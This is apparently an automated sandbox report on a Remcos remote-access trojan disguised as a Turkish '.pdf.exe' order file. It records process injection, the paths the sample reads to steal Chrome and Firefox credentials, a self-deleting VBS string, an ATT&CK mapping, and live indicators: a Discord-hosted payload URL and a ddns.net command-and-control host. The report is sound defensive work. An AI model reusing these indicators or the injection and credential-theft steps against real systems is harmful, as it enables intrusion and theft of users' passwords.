                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_0040F219
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 940000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: C00000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 970000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 990000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 5F0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 810000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 850000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 870000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 1000000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3070000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30B0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30D0000Jump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic
_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe3_2_0040A5F5
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_00410145
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3|
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program ManagerJS;.
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,3_2_00409E7D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoA,3_2_1054B80C
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_004124A0 cpuid 3_2_004124A0
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread,3_2_00402580
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00412163

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\logagent.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 3_2_0040728F
                    Source: C:\Windows\SysWOW64\logagent.exe | Code function: \key3.db 3_2_0040728F
                    Source: C:\Windows\SysWOW64\logagent.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 3_2_0040710F

                    Remote Access Functionality

                    Source: Yara match | File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
                    Source: logagent.exe | String found in binary or memory: Remcos_Mutex_Inj
                    Source: logagent.exe, 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: Remcos_Mutex_Inj
                    Source: logagent.exe, 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.1 Propth_unencoverridev
                    Source: logagent.exe, 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: Remcos_Mutex_Inj
                    Source: logagent.exe, 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.1 Propth_unencoverridev
                    Source: C:\Windows\SysWOW64\logagent.exe | Code function: cmd.exe 3_2_00402B8A
MITRE ATT&CK Matrix (the counts shown in the report next to a technique appear in parentheses):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Native API (1), Command and Scripting Interpreter (1), Service Execution (2), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
Persistence: DLL Side-Loading (1), Windows Service (1), Registry Run Keys / Startup Folder (1), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (1), Process Injection (522), Registry Run Keys / Startup Folder (1), Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Defense Evasion: Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1), Masquerading (1), Access Token Manipulation (1), Process Injection (522), Indicator Removal from Tools, Masquerading
Credential Access: OS Credential Dumping (1), Input Capture (221), Credentials In Files (2), NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1), Account Discovery (1), System Service Discovery (1), File and Directory Discovery (2), System Information Discovery (33), Security Software Discovery (11), Process Discovery (2), System Owner/User Discovery (1), Remote System Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
Collection: Archive Collected Data (1), Input Capture (221), Clipboard Data (2), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (22), Encrypted Channel (11), Non-Standard Port (1), Remote Access Software (1), Non-Application Layer Protocol (2), Application Layer Protocol (23), Commonly Used Port, Application Layer Protocol, Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1), Defacement (1), Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction
Behavior Graph ID: 652390
Sample: Yeni sipari#U015fi onaylay#...
Startdate: 26/06/2022
Architecture: WINDOWS
Score: 100
Signatures on the sample: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures

Process tree:

• Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe (started)
    DNS/IP: cdn.discordapp.com 162.159.130.233, 443, 49716, 49719 (CLOUDFLARENETUS, United States); 192.168.2.1 (unknown)
    Dropped: C:\Users\Public\Libraries\Eluiezilfw.exe (PE32); C:\Users\...luiezilfw.exe:Zone.Identifier (ASCII)
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)
    Started: logagent.exe
        DNS/IP: blessmyhustlelord.ddns.net 37.0.14.195, 49746, 49747, 49749 (WKD-ASIE, Netherlands)
        Signatures: Contains functionality to change the wallpaper; Found stalling execution ending in API Sleep call; Contains functionality to steal Chrome passwords or cookies; 4 other signatures
• Eluiezilfw.exe (started)
    DNS/IP: 162.159.133.233, 443, 49745 (CLOUDFLARENETUS, United States)
    Signatures: Multi AV Scanner detection for dropped file; Injects a PE file into a foreign process
    Started: logagent.exe
• Eluiezilfw.exe (started, second instance)
    DNS/IP: 162.159.134.233, 443, 49751 (CLOUDFLARENETUS, United States)
    Started: DpiScaling.exe

Source | Detection | Scanner | Label
Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe | 22% | ReversingLabs | Win32.Trojan.Zusy
C:\Users\Public\Libraries\Eluiezilfw.exe | 22% | ReversingLabs | Win32.Trojan.Zusy
Source | Detection | Scanner | Label
blessmyhustlelord.ddns.net | 2% | Virustotal |
Pw`~hustlelord.ddns.net | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
blessmyhustlelord.ddns.net | 37.0.14.195 | true | true | | unknown
cdn.discordapp.com | 162.159.130.233 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhmf | false | | high
Pw`~hustlelord.ddns.net | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwm | Eluiezilfw.exe, 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://cdn.discordapp.com/ | Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.discordapp.com/. | Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.discordapp.com/2y | Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.159.130.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
37.0.14.195 | blessmyhustlelord.ddns.net | Netherlands | 198301 | WKD-ASIE | true
162.159.133.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false
162.159.134.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false

Private IP: 192.168.2.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 652390
Start date and time: 26/06/2022 09:41:34 (2022-06-26 09:41:34 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 53s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@9/5@19/5
                                EGA Information:
                                • Successful, ratio: 50%
                                HDC Information:
                                • Successful, ratio: 59.3% (good quality ratio 42.3%)
                                • Quality average: 52.1%
                                • Quality standard deviation: 41.1%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 34
                                • Number of non-executed functions: 230
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Adjust boot time
                                • Enable AMSI
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 20.238.103.94, 20.223.24.244
